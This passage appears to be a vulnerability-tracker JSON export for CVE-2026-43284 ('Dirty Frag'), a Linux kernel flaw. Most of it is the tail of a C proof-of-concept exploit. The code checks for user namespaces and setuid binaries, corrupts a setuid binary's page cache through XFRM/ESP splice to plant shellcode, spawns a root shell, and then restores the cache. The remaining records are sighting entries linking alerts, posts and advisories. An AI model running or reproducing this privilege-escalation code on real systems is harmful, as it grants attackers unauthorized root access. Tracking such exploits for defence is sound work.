read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tstdin_eof = 1;\n\t\t\telse\n\t\t\t\twrite(master, buf, n);\n\t\t}\n\t\tif (pfds[1].revents & (POLLHUP | POLLERR))\n\t\t\tbreak;\n\n\t\tif (!auto_pw_sent && !saw_master_output && total_ms >= 1500) {\n\t\t\twrite(master, \"\\n\", 1);\n\t\t\tauto_pw_sent = 1;\n\t\t}\n\n\t\tint status;\n\t\tpid_t w = waitpid(pid, &status, WNOHANG);\n\t\tif (w == pid) {\n\t\t\tfor (int i = 0; i < 5; i++) {\n\t\t\t\tstruct pollfd pf = { master, POLLIN, 0 };\n\t\t\t\tif (poll(&pf, 1, 50) <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\t\tif (n <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (restore_termios)\n\t\ttcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);\n\tclose(master);\n\treturn 0;\n}\n\nstatic int restore_original(void)\n{\n\tif (!g_have_backup) return -1;\n\n\t// just drop the file's page cache -> kernel reloads from disk\n\tint fd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tposix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);\n\tclose(fd);\n\n\t// verify first 8 bytes match backup (disk copy)\n\tunsigned char cur[8];\n\tfd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = pread(fd, cur, 8, 0);\n\tclose(fd);\n\tif (n != 8) return -1;\n\tif (memcmp(cur, g_backup, 8) != 0) return -1;\n\n\treturn 0;\n}\n\nstatic void parse_args(int argc, char **argv)\n{\n\tfor (int i = 1; i < argc; i++) {\n\t\tif (!strcmp(argv[i], \"-v\") || !strcmp(argv[i], \"--verbose\"))\n\t\t\tg_verbose = 1;\n\t\telse if (argv[i][0] != '-')\n\t\t\tg_target = argv[i];\n\t}\n\tif (getenv(\"DIRTYFRAG_VERBOSE\"))\n\t\tg_verbose = 1;\n}\n\nint main(int argc, char **argv)\n{\n\tg_tty = isatty(STDOUT_FILENO);\n\tsetlinebuf(stdout);\n\tparse_args(argc, argv);\n\n\tif (getuid() == 0) {\n\t\texeclp(\"/bin/bash\", \"bash\", (char *)NULL);\n\t\t_exit(1);\n\t}\n\n\tprint_banner();\n\n\tif (check_kernel_config() < 0)\n\t\treturn 1;\n\n\tif (check_userns_runtime() < 0)\n\t\treturn 1;\n\n\tif (scan_setuid_binaries() < 0)\n\t\treturn 1;\n\n\tphase_header(4, \"ESP corrupt (XFRM/UDP 4500)\");\n\tprintf(\"  %s\u2192%s target: %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_MAG), g_target, C(C_RST));\n\n\t{\n\t\tchar why[256];\n\t\tif (probe_target(g_target, why, sizeof(why)) < 0) {\n\t\t\tstatus_line(\"target\", 0, why);\n\t\t\tfprintf(stderr,\n\t\t\t\t\"\\n%s  [!] Exploit needs read+execute on the setuid binary (open for splice).%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] Shared hosting often blocks reading /usr/bin/su even though 'find' lists it.%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] Use a full VM/VPS/lab where you can: cat %s | head -c 4%s\\n\\n\",\n\t\t\t\tC(C_YEL), g_target, C(C_RST));\n\t\t\treturn 1;\n\t\t}\n\t}\n\tstatus_line(\"target\", 1, \"setuid + readable + openable\");\n\n\tif (target_already_patched(g_target)) {\n\t\tstatus_line(\"patch\", 1, \"already patched \u2014 skip corrupt stage\");\n\t} else {\n\t\tif (save_original(g_target) < 0) {\n\t\t\tstatus_line(\"backup\", 0, \"failed to save 192 original bytes\");\n\t\t\treturn 1;\n\t\t}\n\t\tstatus_line(\"backup\", 1, \"192 bytes saved\");\n\n\t\tprintf(\"\\n%s  [*] unshare userns+netns, register %d XFRM SA, splice\u2192UDP 4500...%s\\n\",\n\t\t       C(C_YEL), TOTAL_SAS, C(C_RST));\n\n\t\t{\n\t\t\tchar err[256];\n\t\t\tif (run_esp_corrupt_stage(err, sizeof(err)) < 0) {\n\t\t\t\tstatus_line(\"corrupt\", 0, err[0] ? err : \"ESP path failed\");\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"\\n%s  [!] Common on shared/VPS hosts: XFRM netlink blocked, splice restricted, or kernel patched.%s\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"%s  [!] Try: uname -r  and test on WSL2/lab. Without userns: CVE-2026-43500 (rxrpc).%s\\n\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\treturn 1;\n\t\t\t}\n\t\t}\n\t\tstatus_line(\"corrupt\", 1, \"all iterations done\");\n\t\tstatus_line(\"verify\", 1, \"shellcode marker at 0x78 OK\");\n\t}\n\n\tphase_header(5, \"root shell\");\n\tprintf(\"\\n%s\", C(C_GRN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  root shell \u2014 exit to restore        \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n\n\tprintf(\"  %s\u2192%s spawn: %s%s\\n\\n\", C(C_DIM), C(C_RST), g_target, C(C_RST));\n\tif (run_root_pty() < 0) {\n\t\tstatus_line(\"pty\", 0, \"PTY failed, trying direct exec\");\n\t\texec_patched_target();\n\t\tfprintf(stderr, \"%s  [!] exec %s: %s%s\\n\", C(C_RED), g_target, strerror(errno), C(C_RST));\n\t\treturn 1;\n\t}\n\n\tprintf(\"\\n%s  [*] shell closed \u2014 restoring page cache...%s\\n\", C(C_YEL), C(C_RST));\n\tif (restore_original() < 0) {\n\t\tfprintf(stderr, \"%s  [!] restore failed \u2014 try: echo 3 | sudo tee /proc/sys/vm/drop_caches%s\\n\",\n\t\t        C(C_RED), C(C_RST));\n\t\treturn 1;\n\t}\n\tprintf(\"%s  [+] target restored from disk.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n", "creation_timestamp": "2026-05-26T12:10:20.000000Z"}, {"uuid": "2e0a09dd-7dbb-481b-ba58-62e88c611882", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/85933", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43284-DirtyFrag-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jayhutajulu1\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-26 07:41:16\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nProof-of-concept for CVE-2026-43284 \u2014 4-byte XFRM/ESP page-cache write primitive to patch a setuid binary (x86_64, user namespaces). Includes kernel preflight + SUID scan.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-26T08:00:04.000000Z"}, {"uuid": "13eb7602-df1a-456c-9793-cd4a00ea40bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/boredchilada.bsky.social/post/3mmreydlwtg2f", "content": "~Cybergcca~\nCCCS released security advisories addressing vulnerabilities in multiple Moxa and ABB control system products.\n-\nIOCs: CVE-2026-31431, CVE-2026-43284, CVE-2025-11482\n-\n#ICS #ThreatIntel #Vulnerability", "creation_timestamp": "2026-05-26T16:10:58.363791Z"}, {"uuid": "777ac17d-0350-4843-9a6c-f8a4fb197af7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/control-systems-moxa-security-advisory-av26-509", "content": "", "creation_timestamp": "2026-05-26T05:59:13.000000Z"}, {"uuid": "4830b5e9-f641-4494-bff1-5caf0dfd407e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmv6kqysopn2", "content": "Dirty Frag: a kernel zero-day vs. container and microVM sandboxes On May 7, Hyunwoo Kim (V4bel) disclosed Dirty Frag \u2014 two Linux kernel vulnerabilities (CVE-2026-43284 and CVE-2026-43500) that gi...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-28T04:26:27.217161Z"}, {"uuid": "5a3a9099-362b-4fcd-a8c7-651a2beac968", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/IqAYll4ZzjxpeZQ_8CUvuT_fob3B5lJjEUBfv2EUXY56hck", "content": "", "creation_timestamp": "2026-05-27T21:12:27.000000Z"}, {"uuid": "2699401a-bdae-4dde-8112-c643b4422d26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/mitel-security-advisory-av26-524", "content": "", "creation_timestamp": "2026-05-28T12:10:15.000000Z"}]}